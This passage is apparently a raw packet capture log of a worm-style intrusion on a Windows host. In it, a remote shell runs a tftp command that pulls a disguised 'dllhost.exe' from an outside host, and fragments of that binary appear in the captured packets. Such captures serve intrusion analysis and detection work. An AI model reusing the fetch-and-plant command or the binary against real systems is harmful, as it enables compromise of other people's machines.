516 ....o.....0...UVW.A..3...$5....$....4........@(...........+..D$. ...................>...P...I:|$.7j..?.}..!0.....ty.L59(SQW.....* ..t[.5 A@J-@..T$0j.R..fn........I.<0PQ.7c.....(.RC$.......W...@F _._^].....`.........7.}QSV}<p........~....u.........y.K...C..?.o G..2..u.)-.........,...@.....[....V%.D.H...@......`..3.3..l..... ....................^..[Y......l../u,h.(h.t...,l..,...t....A..n. ....D.......<kX..P.|.h.'..|.s..t.....fw.5.hxt..`.u...9.W...(v6.. p.....,^..6......Ph.....;..V`....1....Q.}.....f.|...u$c[..s.>..h l../ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.615430 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:149 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.616403 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40875 IpLen:20 DgmLen:544 Len: 516 ....lj.,.l.f.S...PU.v......X....0d.....5..h...D....{.n...jd..... ...u..,l....|~.Rj.k..'.......@Is..u.~[...P......<`W h...{..=...# h.....F.......=<.no..b.\...x...e..*...V>.l.%f.....%..H...@t..K.d {........1..k#...L......ZJNf.4U|Si...Y...r .,..2.......a.....O.. ....j...}t$ W[3.3.....r.....\X.....'..(..6............ ......... .{.............<.........F.7L.:.........y.=..j..X...O..u....6X[_ tH...PS......A..,...$Pjgk...h@,.....Q.... +...nG..W3....,.q.p.|. .....=./km.z..2..}.....5..#C;.*......x/.h`.?xm.jF.._..A.V.N.A..L a... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.617569 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40881 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x6725DD25 Ack: 0x7339CD27 Win: 0xFDBD TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.617881 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:150 IpLen:20 DgmLen:117 DF ***AP*** Seq: 0x7339CD27 Ack: 0x6725DD25 Win: 0xFA50 TcpLen: 20 C:\WINDOWS\system32>.tftp -i 137.189.153.17 get dllhost.exe wins \DLLHOST.EXE. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.617998 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:151 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.619736 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40882 IpLen:20 DgmLen:544 Len: 516 .....9;`.8QT...t5..R..0a...t.$.a.....R.@^].....b-.$M.....r{.v..z ....0z|p.lC.dxv..fG.P{.\.|.........P./.........2.T....d......8.. Q5`}.QP.<D.i...@.HDXO.m.TPLf.lpnw68..h..U...__v#..T.$t4......a.. .ZK)........b0...K.......<...........w...u.f.....V...L...4...w.. ...6..Y!6f...T"...l@.B."...d.1.xq..<....2......V..........f.m... ...........f.......o...f.....u...-..(a&..V....-7..D.z.v..4.r.... ...g+..Q`W<.u.R1(0........_0.~..m.#...t&.....Mz..PQ... X.f.T..;. j:.v.)...%.......... N_tJ.....(."d.v}4.P;.Y..tL.vf]...c.....<.dv a60- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.621266 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:152 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.622836 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40884 IpLen:20 DgmLen:544 Len: 516 ....t.-x..........f.....T.\.t.h4.t#.t.........j...&c.-CX.u.&Fl.6 ...|..u.g|.XC.[.W.p.u.....~.od...(W...................".^..j..NH .p5 ...0....EPh....2...&Togu......p....6.{(....t.V..`.......Qs.. ......F..w.IQl.xF..hA......p..l...x`..o..t(..g......V..0...P'b.. .u.....,.k...........Vo.V(..D1R.il.`6W.v$._.dA.u.<e.j. .R]d..V., -l.Lsl.w..+..X.>..`.=..a'..Gh.....~0..,cw(>.YQ.py!+D......-;Y... .......i..0....=.....%.v........b.Q..L.l..=......b+..oq~...0g..6 h.b.......Jc`oV..b.O........F.aC...t.B..>.A.....]........Rt..... $c.[ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.624380 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:153 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.625570 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40885 IpLen:20 DgmLen:544 Len: 516 ......H....r...<; c..u.@(v..#..tf...N}/..YtMBP..<i./6.h.{.4.1..T 5...*%.}.h..`i..3..V`...yz.].P...k.C+..y....0./`...B....t.V..... PmXtg.Q57...[X.PO2.O......H...W;..&.lo......\L............[...O1 ...t.....'..P@'.......G..;..=-u.A.z......\..$o...;...0R.z....... ..$....9.......H...~. ......<..0F...mi.>..1^.P...+).$f&..-.F.!.K U68cmF%5;T5pM..R?.N.;.Rs.,2.<...y.>.......J.Iu..Z3....-...{.~Y.O .."..rvK...,.ipt.]...<f..+8.O.v[':..u._+.^.t..f-.P.b...._.P.f..; .W...a.m5.C..n..9........pt.......O(I.p.L..I.Ft..IV..o...WK...|T ...6 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.626025 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:154 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.626948 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40886 IpLen:20 DgmLen:544 Len: 516 ......3..W.f....'..v.....gl.......fl......H(X...+.$.SiL......,.. .g]..%.W|:...j.....Z..Y....j.....a..=$ex..o...j......#5(....6... @5....+.?>.o.1+_.2....=..... ...z....D>(,..i..4(..Qh..PDtE.x...H ..W..!.64s......(.'....(...p6au.H....*.w.3.uisvV...Q.$....r..... .....p....A,0.5.w...,.lt....@zX..W`^.....*..cBL-{.0.h.b.....2h.. ..V.K_....Ph.......,...........w...H..........W..c...p.."$.X@H.{ .S....d..;.......L$(...w.q6..U.]...0.....4@.<......$0.QU...=.L.. 78O...3@h..c@.t......$...R.....V.W...........W.l.6...U.v(..=.S.. 2..d =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.628472 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:155 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.629503 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40888 IpLen:20 DgmLen:544 Len: 516 .....=.......BsB_4U]..U..l.e]-4..=.AK<.E.0.,..M.L..F..8.U..-[. . JSV.".`...@Mm........)...."..~[l.B..>.a.....-.. QFS....N 2.{.u&. .+....j.+$6B.,jR]...C.B...|..........nw.......d..........Hs..... ..'...{v....[.k..o.Vt-..8;.v....).......\x..<+.;.w.{t.....K<|0$. 3............S..I..!..Z[xK.L_..J*...p...J...0..F......8..b..!".! .~...PV..ou.bn3.,/&3.&......._.ph.<4...z....`=..kG.t.Q.s_G....k. ..u..tw..Q.. )..X%8.>bH..n0.[.qF(..~...B..$.J......cR.......u... ......Lw..........u)w..$...hL.\q..........T.-j...t..=.....C..... .=.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.629950 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:156 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.630888 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40889 IpLen:20 DgmLen:544 Len: 516 ......[NQM...M.(.......3.h...p.H.~#..t4^.a.6..|j....n=0..).....S .z..r......L.A..Q.t.~_6..$....PR.x...D.8...y..~QP.E.:..........5 ..u....R.f.....]..:.d....o[.....8|/...B.....pN....p...#.4.A=...k .,...5..k.;......s..L.1,.S.d+Q.)....!....X....j\.hf!......:S.$0Q ..V.'..m.-.F..f....zf.....Cl=..=`.V.>.....|,wu............u.3... ......h..(........!."B.l.....1..yW...6.j..T.q.....h6Hh4Tj%K`.]ZA .Q&.H..(h.t.8..A$.dKLb.GpJ.......Q,.[X....t.U..:D*3dF...ga/_..!. ..\..$..0 .<..N.jP....<.."...pK..9...QU.n .i.C..f.G.$.hd\@...... H..9 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.632486 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:157 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.633609 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40890 IpLen:20 DgmLen:544 Len: 516 ....#Yqy.[@.d..>.QlXC..j...>.HXqh...f.A.d.&...n.1......R8..9.lV. +.-.X7.V.,c.9.....(z...O.['..........L .#.&{...DR^.P.n.A.Q?L=h.t .C..R.H...jcP.X...9.{....Q.......tY..t.X..Bo.R.)A...[.....8...L. ....P.Xg....5.j...h)B....VR...O 1..48.P.5.0z.W...k..x...0.7..Q.p 3.;.....*.. ~<u.....y..+WPQ.ht)....Y..2d}..Ukno..3+.........)".@ H..fs..%.H.8[\>u!.h...1d....O.Pd.%.. S......ese..('Y...lg3.....$ d[...v.....wd........_\ha. ..=.@.'.0...H.O..YPF.g.!P(...@E.vs... .....P..g....PP..2....C\mM..u..6..e..D..I.W...4..E......M.P60lm. .Y.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.634124 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:158 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.635045 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40891 IpLen:20 DgmLen:544 Len: 516 .....+....}G..@..`.5dv..&)!.).5...q#,A0..d.;...X@.PTafdd.......Q ..9"..g.0D...y^>..%u5390.665ead993k..n756..f8..#.#..f4e40....?23 .12cM09...N.ad48/088..d..9a.a85..~.2_aa.d8.d6_..v.b.wcq9....|fil omid.fafdfgfhinhnl. ..aljbea.limpdk+....ji.ipefp.+n.....p.gekbai jeh...vk..dn.mh1+..kn.w?yiasj..=...%B.de.67.bmg...g......i.]eo.h Ab.m.k6.sk.e......j.j.icggkng5.v.5..ok.ogW...6..fO.p.'md.a...ech m....Z..yeddccbb..#o...f;.hh.-....S.w595168.]p.7...18......<?xml version="1.0...."?>..<g:s.rchrequest %....ns:g!DAV:"ql.Se..k.Dc .Ps =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.636572 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:159 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.637621 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40892 IpLen:20 DgmLen:544 Len: 516 ....p...X.y.me" fr8 scodo...()//0.\......0=.=.=.=.=.=.=.=.=.=.=. ....=.=..`.d.g.h.f.q...].b.......*.5.....H.D.W.T.\.`.b.S._...... .......m...........G...j.........?.X.Y.E.....K.U.h.........m.k.. u.......l...q.p...4.._.L4.f..^d.]|..k*......H..^......W.......9. ...F.]..........+...\.H`7G....u....?...K.&...2$X..EdI.p..t,..`^. .p.4...G|.......*.{..M...j. .nr..MARB3...9.........`o..EOW.].!k. .8..0~....(....3..r...C..L..._...(..d)...H.l.s...dH.d...t_H..s`. X.5M..@ x...}3`.PO.. ......._H.6...f.....+...x.x....p....O...&.. .=.W =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.638073 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:160 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.639047 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40894 IpLen:20 DgmLen:544 Len: 516 .....W2.1....N...C....%....;..c.........J...6....Poz....0O..._n# ... /....d...F.?.......Gh.x.h..h..w_...[.\.C.$.A...1-3.4.5.6.... ..sd.o.c.N.B.....R..2.............ZJ3.f.v......4.........pa..!.. ../.......4....A....j...........b....t......k...j?.....^..{....p ...T....ZHx.X.P.......Z{Xx..S..c.n._..I....7..q.n..`f.e.h......u ..m......{b.........m"m!.......^..............Y!....^..........~ .q^..I.^....L......na.e.u25.Y.`.x.....K..2{wZq.f..........{o.... ........................c.............y........c..).........$..o .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.640571 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:161 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.641563 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40895 IpLen:20 DgmLen:544 Len: 516 .....:..W ?.. -..*....&..(...../.7.M.y dllca.e\t}...ft4.exe w(s\ sv..+..o.........DLLHOST.EXE......IT8S.Patch.V..ArZI..../.==.... ......./...bc4wGETRh.-. HTTP/.1`A.FoT..t: .)......,.x-mq..xbitp. j.g..g..p.*/*AU.o[..r-A.nEM.ioa/4.T.B. (.5..m.F..;.SIE 5.5..Q..W .:ws 98....\H.5..Cg....n0n.Ke...j.S{..5..g... I z[.... my.f.& "b ..Bm{:)~. _vxn....CXan.NoTcehs.] 2.42. B.6[`mA.lf8.....orrCzh}gv 6oh.".H.t-..^v://.n..m..V.V.8..q.Q.../6/9/5.Z7d7./..Y-fb7a-4.9-b 1e6-...*?zb62fl2....'..0-KB823...o..x8%KOR.s/...o8/f.8.716.r..1- 8db3 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.642013 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:162 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.645036 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40896 IpLen:20 DgmLen:544 Len: 516 ....sf4570a56b.+...9d8.sCHT..f"21.81c0df>..Z.772bs.L912...M=TbSe 9.s.<.vS.0/101fddmk/.40f-efc533d..2..mk.4\.e4.5s....ENU.3m+twue3 1\2..5G..Wh|.s[3e81eb45.!..54fXP..9.B[3GA6rCk..3dH[507.]..ac2i32 .3...F.8s.s...]a.5.+d0C..Gy3a38DM4.5e....Yde..s....S9Cb.Zk.F)cf. dl.5u@..8sm-95#.p+%.3f.s..-...q -i %s <...get nSVC..../).b.. .. $.-..w&k .8Shar....+g.l..DTCo$.L.B..j.V..+WINSX..5.zF.wAX..nr.`K .,....-n.ozqm]../S*v.P_kn...Xsyx.,>cZ`{.T.eou.o.u..1..ecTraUf5.n .,-u.s.ul.F00.6.Da...... ....%.7...M `p.j....l.7...G....t.-Typ.. xt/m =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.646583 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:163 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.647510 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40897 IpLen:20 DgmLen:544 Len: 516 ....o..N.l.gth.3.o?hA.YX..SEAR...^....}.....KP.......m.O.W"E\.\U .....aO:y.a..A.P2\E.3.E..1y...t55On.`l&@.nKcf....ig.aN .uEn6..Q D.+mIP 0....dr...%.X..p-d.+_Mu..1.H{mszap.`.....11....C.4n'k..D. ..-I....IS.... B......X....BR...2....GetL.`..DError.I..J..rlocke dDecRa....#.balAl..@.n.F.e.Op.P8_...dIF.Attro%..ibut.AS'....Modu .Hand..Un.....ViewOf-.C]....v.A.^.6.InL...,....]V..3.g.ExxC$=... X.OEMCP.S{..NW.fa..CID..}...Nam.TRmin.....EWai.>S.....%ObjH6{... 95x....<Tim.i.......,u..Th.d^[..<.p../;\.>so..ir.MvsftyA6o!help3 .`.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.647968 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:164 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.648955 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40899 IpLen:20 DgmLen:544 Len: 516 ....2S.pshoPg.+.X....NYo6...=s.E....KU.....mR....%h.ge}.g..C.2.. l.,Qu.y.Start{7K.Q.pRegi.q.1.r6#l.r....9.DtusL.P..+D..e!.=..0... .vA.AAdjust1Y@.bws.F...SC.rhl.aY.?......3!..Key.\.=..3.=..#.y..u p..acV2u|.PIci...mp...8F..7.|.E...,.7...er.h..._Xcp.r.__.nG...rg ._..-..".m..r......rd.??2@YAPAXI@Z6p....X,ev..k.>Cs7..WaJ6.`._fd ..9m6Z..D....f....b..f...-6K>p.typ.w....._h.3.w...Y9.fp..\....3X ...,.\mGm........1URLD..t.Qj...H........$eY.MP....9..eY.4.....Y. eY.t......es..qPE....L.... .......fA..R@../.d..........[.t...1.. .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.650551 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:165 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.651562 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40900 IpLen:20 DgmLen:544 Len: 516 ......6..!..A...)...&...l...:!.0.-....`.r.a).0.S...j....@.&<.&P. ....'....C.^u.......................`..p@.......W.............F. .G..u........r........u............s.u........s.1....r......F... tt....u............u..........u A..u............s.u........s.... .........../...v...B..GIu..c.................w....L...^...]..... G,.<.w..?.u...._.f........)..................p......tE._...0.... ..P............G..t...y....GPG.WH..U........t..............a.... ................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.652005 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:166 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.653051 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40901 IpLen:20 DgmLen:544 Len: 516 ................................................................ ................................................................ ........$...............................<...L.......Z.......h... ....v.......|.......................KERNEL32.DLL.ADVAPI32.dll.IC MP.dll.MSVCRT.dll.urlmon.dll.USER32.dll.WS2_32.dll..LoadLibraryA ..GetProcAddress..ExitProcess...RegCloseKey...IcmpSendEcho..exit ..URLDownloadToFileA..ExitWindowsEx............................. ................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.654592 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:167 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.655132 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40902 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.655414 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:168 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.818102 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40919 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x6725DD25 Ack: 0x7339CD74 Win: 0xFD70 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.818479 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:169 IpLen:20 DgmLen:124 DF ***AP*** Seq: 0x7339CD74 Ack: 0x6725DD25 Win: 0xFA50 TcpLen: 20 Transfer successful: 10240 bytes in 1 second, 10240 bytes/s..... C:\WINDOWS\system32> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:11.319971 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40938 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0x6725DD25 Ack: 0x7339CDC8 Win: 0xFD1C TcpLen: 20 wins\DLLHOST.EXE.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:11.320504 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:170 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0x7339CDC8 Ack: 0x6725DD37 Win: 0xFA3E TcpLen: 20 .wins\DLLHOST.EXE. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:11.518707 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40943 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x6725DD37 Ack: 0x7339CDDA Win: 0xFD0A TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:12.319966 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:41005 IpLen:20 DgmLen:40 DF *****R** Seq: 0x6725DD37 Ack: 0x7339CDDA Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:12.720274 192.168.20.2:1034 -> 137.189.96.50:53 UDP TTL:128 TOS:0x0 ID:171 IpLen:20 DgmLen:59 Len: 31 .............microsoft.com..... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:12.931773 137.189.96.50:53 -> 192.168.20.2:1034 UDP TTL:253 TOS:0x0 ID:34515 IpLen:20 DgmLen:289 DF Len: 261 .............microsoft.com...................................... .......-7...dns1.dc.msft.net.........-7...dns1.sj.S........-7... dns1.tk.S........-7...dns3.uk.S........-7...dns1.cp.S.........9. ......K.......9..@....i.......9..A6...........9...............9. ..... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.218010 192.168.20.2:1034 -> 137.189.96.50:53 UDP TTL:128 TOS:0x0 ID:172 IpLen:20 DgmLen:68 Len: 40 .............download.microsoft.com..... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.682166 137.189.96.50:53 -> 192.168.20.2:1034 UDP TTL:253 TOS:0x0 ID:34516 IpLen:20 DgmLen:401 DF Len: 373 .............download.microsoft.com................ .dl.ms.geore director.akadns.net..4...........download.microsoft.com.d4p.O.`. ..........a767.ms.akamai.O...................................... .......................n4ms...............n5ms...............n6m s...............n7ms...............n8ms...............n0ms...... .........n1ms...............n2ms...............n3ms.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.695115 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:173 IpLen:20 DgmLen:48 DF ******S* Seq: 0x734A91C2 Ack: 0x0 Win: 0xFAF0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.696712 202.181.234.24:80 -> 192.168.20.2:1036 TCP TTL:61 TOS:0x0 ID:2393 IpLen:20 DgmLen:48 DF ***A**S* Seq: 0x6BE55150 Ack: 0x734A91C3 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:13.697038 192.168.20.2:1036 -> 202.181.234.24:80 TCP TTL:128 TOS:0x0 ID:175 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x734A91C3 Ack: 